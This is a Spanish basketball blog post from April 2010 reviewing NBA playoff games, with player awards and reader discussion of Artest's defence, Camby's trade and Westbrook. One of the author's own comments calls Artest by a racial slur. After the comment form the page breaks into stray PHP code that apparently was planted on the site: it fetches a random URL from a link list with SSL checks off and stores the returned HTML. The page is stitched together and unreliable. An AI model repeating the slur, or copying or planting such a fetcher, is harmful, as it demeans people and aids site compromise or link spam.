Playoffs 18/04/2010: Liberad a André

19 de April de 2010 por TheDeerHunter

Y al segundo día estalló la primera sorpresa. Los Blazers lograron romper la ventaja de campo de Phoenix en su primer intento. El equipo de Nate McMillan desplegó un juego altamente equilibrado tanto en lo esperado defensivamente como también en el aspecto ofensivo, sorprendentemente colectivo e imprevisible marcado por el carácter baloncestístico de André Miller, absolutamente liberado de ningún corsé. ¿Quién lo iba a decir a principio de curso? No cabía en la imaginación local que los duelos Nash vs Miller y Stat vs Aldridge podían caer del lado que no fuera el suyo. Ambos se perdieron y la cosa no quedó ahí. Batum, Bayless y Camby fueron “agujas de Budú” clavadas en cada uno de los puntos vitales del rival. Con todo, los Suns aún tuvieron alguna opción de evitar la derrota, hasta un triple para empatar que marró Nash a escasos segundos del final. Tampoco lo hubieran merecido.

En el resto de series ganó el equipo de casa, pero con bastantes dificultades en todos los casos. Los Spurs estuvieron cerca de pegar el primer golpe contra Dallas. Muy bien su “Big Three” pero demasiado tímidos el resto, en especial Richard Jefferson. Sin ningún plus de producción aún mantuvieron opciones hasta el final contra un Nowitzki majestuoso, un Kidd cercano al triple doble, un Butler determinante y una muy buena contribución de la dupla Dampier-Haywood bajo tableros. Ambas escuadras todavía tienen distintos márgenes de ajuste. Puede pasar de todo.

Los Lakers tampoco lo pasaron bien contra unos Thunder francamente bien trabajados y eso que durante el primer cuarto parecía que la cosa iba a terminar con paliza. A Kobe no se le ve bien, muy intermitente y fallón (¿no llega a un 60% en TL? Si se parece a Shaq!!!) y desde ahí resulta complicado perforar una defensa tan activa como la que ha diseñado Mr. Brooks. Después deberíamos añadir otra clave a la eliminatoria que no es otra que los Thunder puedan correr o no y la perspectiva de la serie cambiaría por completo. En estático se vieron completamente maniatados, en especial Durant al que se le hizo de noche con una defensa de Artest de manual. Difícilmente puede entenderse la victoria de anoche sin su concurso. También fueron decisivos Bynum y Gasol en el regreso del primero al equipo. Su producción conjunta ascendió a 32 puntos, 25 rebotes y 7 tapones. Sólo Westbrook pudo escaparse en ocasiones al basket control de Phil Jackson y al inteligente marcaje de Dereck Fisher y lo hizo siempre en carrera donde hay pocos en la liga que puedan frenarle. Independientemente del resultado de anoche insistimos en que esta eliminatoria es mucho más igualada de lo que representa un 1º contra un 8º y esto no ha hecho nada más que empezar.

Para terminar, el duelo menos igualado fue el Orlando – Charlotte y eso que Howard sólo anotó 5 puntos y su equipo llegó a desperdiciar una ventaja de 22 puntos. Eso sí, Howard se puso el traje de Supermán para sumar en 28 minutos 9 tapones, igualando su propia mejor marca del año pasado. El partido lo marcó la gran actuación de Nelson, bien secundado por Rashard, Pietrus y Redick y la lesión de tobillo de Stephen Jackson, que no le impidió seguir jugando aunque menguado. El mejor de su equipo fue, una vez más, Gerald Wallace.

PREMIOS

MVP: Dirk Nowitzki llega con ganas a estos Playoffs posiblemente con la sensación de que la historia le debe algún anillo. Anoche lideró a los Mavs con 36 puntos y 7 rebotes. Por su parte, Andre Miller fue clave en la sorprendente victoria de los Blazers con sus 31 puntos, 8 asistencias y 5 rebotes.

Rookie: Declaramos el premio como desierto. De los rookies de los equipos clasificados para playoffs tan solo 2 saltaron a la cancha y ninguno anotó un solo punto.

Sorpresa: Ni Vince Carter, ni Dwight Howard ni Rashard Lewis… El jugador más destacado de los Magic fue Jameer Nelson con 32 puntos, 6 asistencias y 4 rebotes. Cuidadito porque el año pasado no llegó en buena forma y este año se puede convertir en factor diferencial.

Decepción: El mega duelo de primera ronda se salda con decepción por ambos bandos. Kevin Durant 7 de 24 y Kobe Bryant 6 de 19. Las defensas les exprimieron a base de bien. Dwight Howard estuvo hipercontrolado en la zona y producto de sus nervios y su ansiedad tan solo puedo anotar 5 puntos. Eso sí, se marcó 9 tapones marca de la casa.

Esfuerzo en vano: Parece que Gerald Wallace ha llegado en perfecta forma a los Playoffs. Los Bobcats lo tendrán difícil pero si su all-star se mueve en torno a los 25 puntos y 17 rebotes de hoy, tendrán muchas más oportunidades.

Y MAÑANA…

¿Lograrán los Bulls inquietar mínimamente a los Cavs? Y sobretodo… ¿podrán los Jazz plantar batalla a los Nuggets con la baja de Mehmet Okur?

Comenta

15 comentarios a esta entrada

  1. Txusma dice:
    #1

    A ver los q decían que el fichaje de Camby a mitad de temporada había resultado un error. Los Suns han salido con Collins de pívot titular y Camby les va a hacer un roto partido sí y partido tb. Ahí puede estar la eliminatoria.
    Y lo de los Magic me da que no ha sido tan fácil como aparenta. De hecho creo que ha habido 3 jugadas polémicas que podían haber inclinado la balanza a favor de los Bobcats en determinados momentos del último cuarto. Tendrán que espabilar…

      Citar

  2. kantonyo dice:
    #2

    Respecto a lo que yo dije sobre Camby, deje claro que era un buen fichaje a corto plazo, pero no lo veo así a largo plazo. Es bueno ahora motivado por las bajas de Oden y Pryzbilla, era esencial conseguir un pívot si se queria dar guerra en playoffs, pero creo que con fichajes como este se está devaluando la gran plantilla que había hace dos años.

    De todos modos Blazers hizo ayer un gran partido, en especial Batum, que pedazo jugador, que pena que sea tan irregular.

    Yo sigo viendo a Lakers muy por encima de Thunder. Por cierto Deer, jugó Ibaka, no hizo tampoco gran cosa, pero estuvo decente, 5 puntos- 5rebotes en 22 minutos.

    Nowitzki genial, se marcó un autentico partidazo el tio. Está en uno de sus mejores momentos en su carrera y sobre todo teniendo en cuenta que San Antonio demostró su potencial. Para mí la eliminatoria más interesante y con más talento en la pista.

      Citar

  3. sergio dice:
    #3

    A mi el fichaje de Camby nunca me pareció un error. Principalmente, porque el equipo no tenía ningún pivot y estaban luchando por Playoffs.

    Como ya dije en el analisis, creo que la fama de perdedores de Phoenix y el depender casi en exclusiva del rendimiento de dos jugadores podria pasarles factura. Si jugase Roy aspotaría por Portland, porque es un equipo que no ha permitido grandes actuaciones a los jugadores rivales durante la regular excepto en posiciones de aleros. Creo que Phoenix tiene la eliminatoria en su mano siempre y cuando sus dos estrellas se pongan las pilas… , pero siempre tienden a pasar rondas los equipos defensivos en Playoffs.

    Como aventuramos, la eliminatoria LAL-OKC se decidirá por la defensa de Artest y por si el equipo de Durant es capaz de minimizar el impacto del juego interior de los amarillos.

    Por cierto, como me gustan los duelos SAS-DAL……, siempre son duelos apasionantes. Y la verdad, me encantaria que pasaran los Spurs.

      Citar

  4. TheDeerHunter dice:
    #4

    Me fijé particularmente en Ibaka. Confieso que le conozco poco.
    Decente… no diría que no, pero es que no me transmitió absolutamente nada. Quizás sí me parece que será una buena pieza para la defensa que plantea ese equipo.

    Quiero insistir en el partidazo de Artest anoche… peor en ataque es difícil que lo vaya a hacer, posiblemente su peor partido mirando al aro de toda la temporada (y ya es) Pero hasta Daimiel tuvo que reconocerlo… difícilmente se hubiera ganado anoche sin él. Si exclusivamente desde la defensa no fue MVP del partido se quedó muy cerca.
    Y fue un partido limpísimo por su parte, que eso también hay que decirlo.

    Que quede muy claro que es por eso por lo que le pagan los Lakers, no por anotar 5, 10 o los puntos que sean. Para eso tienen a otros.

      Citar

  5. Love Denise dice:
    #5

    no vi el Lakers-Oklahoma, tengo una pregunta….fue muy sangrante el duelo westbrook vs Fisher,?

      Citar

  6. TheDeerHunter dice:
    #6

    Westbrook está fuerte, hizo alguna jugada que difícilmente hubiera parado ningún otro base de de la liga. En una ocasión Odom intentó pararle en vano en una penetración contra tres saltando Westbrook más que todos sus rivales juntos. De todas formas también me dió la sensación de que le acompañó la suerte en alguna de sus jugadas más forzadas… anotó prácticamente todas ellas.

    Con ese físico yo ni me plantearía la idea de que Fisher, Farmar o incluso Shannon puedan aspirar a frenarle. Él solito mantuvo al equipo en la pomada, imparable cuando pudo correr. Por suerte para los Lakers no pudo hacerlo muchas veces… y por ahí Fisher le comió la tostada casi todo el rato.

    El bueno de Fish hizo todo lo que estaba en su mano muy eficazmente. En estático lo controló en todo momento y después anotó gran parte de lo poco que le llegó a las manos. Me hizo gracia que la canasta que cerró el partido fue un canastón rollo el del año pasado contra Orlando en la cara del propio Westbrook.

    De todas formas, Westbrook es peligrosísimo… y aluciné con el quinteto físico que sacó Brooks: Westbrook, Durant, Green, Ibaka y Collison es una berracada.

      Citar

  7. Love Denise dice:
    #7

    ok, gracias deer

      Citar

  8. sayim dice:
    #8

    Deer no sabía que ese quinteto hubiera coincidido en cancha… Fue mucho tiempo? como estaban los emparejamientos en ataque-defensa? es que a bote pronto se me ocurren ventajas claras para cada lado dependiendo de las circunstancias

    Por lo que se comenta en todos los sitios, alguno va a tener que comerse sus palabras de que Artest no estaba entre los mejores defensores en su posición… Yo estoy deseando ver el duelo con Melo en segunda ronda si pasan los dos (van a saltar chispas…)

    Yo era de los que no acababa de ver el traspaso de Camby. Todo depende de con que óptica lo mires. Es un fichaje para estos PO, en los que es impensable q Blazers supere la segunda ronda (yo sigo pensando q no llegarán). Sin embargo es un jugador veterano, sin ningún recorrido a partir de este verano y que no va a hacer crecer al equipo. Puestos a desprenderte del que empezo la temporada siendo tu base titular y de un anotador bastante fiable, yo creo que se podría haber obtenido algo más en el mercado que hiciera mejor la plantilla también los proximos años. Solo es una opinión

    Un saludo a todos

      Citar

  9. TheDeerHunter dice:
    #9

    Pues yo diría que coincidieron juntos una buena minutada durante el último cuarto. Por ahí, Phil Jackson no se inmutó demasiado y, hasta que Odom fue eliminado jugó con Fish, Kobe, Artest, Odom y Pau en una especie de “zonilla” 2-3 que implementó… y como los Thunder estaban como estaban desde la línea de 3, pues…

    De Camby, yo lo veo un fichaje obligado y tampoco hay que darle muchas vueltas. Yo dudo mucho que, con las necesidades del equipo, hubiera habido gente más interesante en el mercado para ellos. Entre comillas perdieron un poco trayendo a Camby (en cuanto a lo que dices de Blake, aunque no tanto por Outlaw que no contaba) pero lo necesitaban hacer y la jugada les está saliendo bien por el momento.

      Citar

  10. LEmontus dice:
    #10

    jajaj gran defensa de artest para callarme la boca aunque como siempre ya están dándole mucho bombo y publicidad, la verdad que defendió de lujo es cierto aunque tampoco fue el día de durant veremos el próximo partido. Insisto en la publicidad de artest meterse en marca o cualquier diario, esa defensa la hace otro y nadie lo dice.

    Lo de Blazers no lo considero sorpresa por dios¿ es que tiene mal equipo?, son un EQUIPAZO.

    Que bueno es dirk y que mal lo hizo jason terry que debe mejorar para que mavs haga algo.

    Creo que magic tiene mucho equipo comparado con el resto tiene muchísimas alternativas en ataque y tres de los mejores defensores(pietrus barnes y howard). Solo falta que vince la lie en los partidos importantes.

      Citar

  11. TheDeerHunter dice:
    #11

    Es difícil tener el día cuando cada tiro que haces lo haces con la mano de otro tapándote los dos ojos.

    La publicidad se la damos a quien se la gana. Y no, no ha habido ni un sólo jugador en toda la liga que haya defendido a Durant esta temporada como lo hizo Artest anoche.

      Citar

  12. Txusma dice:
    #12

    Otra cosa a tener en cuenta es que si te exprimes en defensa como se exprime Artest y más si enfrente tienes a Kevin Durant no puedes atacar con alegría, la soltura y la claridad de ideas que posiblemente te gustaría. Los que jugáis a basquet seguro que estáis de acuerdo.

      Citar

  13. kantonyo dice:
    #13

    Deer, lo de Ibaka te lo decía simplemente por lo del premio Rookie, que te habías olvidado de él. Pero ya que dices que no te transmite nada, ten en cuenta que está aprovechando los pocos minutos que le dejan, con sólo 19 años, y sin haber salido en puestos altos del draft y tampoco venia con mucho nombre de europa. A pesar de sus 2,08 se puede convertir en uno de los mejores reboteadores en los próximos años, y mes a mes va mejorando cosas en ataque, vino a la NBA, MUY MUY MUY verde.

    Coincido con Sayim en el tema de Camby.

      Citar

  14. LEmontus dice:
    #14

    Además de defender bien a un tío como durant es necesario que no tenga el día Durant falló triples solos, falló entradas tontas como la que fue taponado por kobe que marcó fatal los pasos con fisher delante…. por muy bien que defiendas a Durant(wade,kobe,lebron,melo,Ginobilli) como tengan ganas de meterla la van a meter y punto. Pero no hace falta hablar más el próximo partido será una buena prueba de lo que digo.

      Citar

  15. TheDeerHunter dice:
    #15

    Ese es el pez que se muerde la cola.
    Cuando uno disfruta de facilidad para anotar O SE LA DAN porque no le marcan bien, suele coger confianza y cada vez le salen mejor las cosas y es más difícil defenderle.
    Cuando uno, por muy “puto Jordan” que le hayan llamado este año, no se quita de encima un negrata de casi 120 kilos de puro músculo ni con aguarrás lo más normal es que muy cómodo no se encuentre, los nervios empiezan a florecer y las cosas cada vez salgan peor, siendo más fácil defenderle.
    Todo esto es de Perogrullo…y el mérito sigue siendo todo de Artest. Quien lo viera lo sabe.
    Y más pruebas en la cancha, por supuesto.

    Kantonyo, no sabía a lo que te referías con lo de Ibaka. Estoy de acuerdo con lo que dices.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>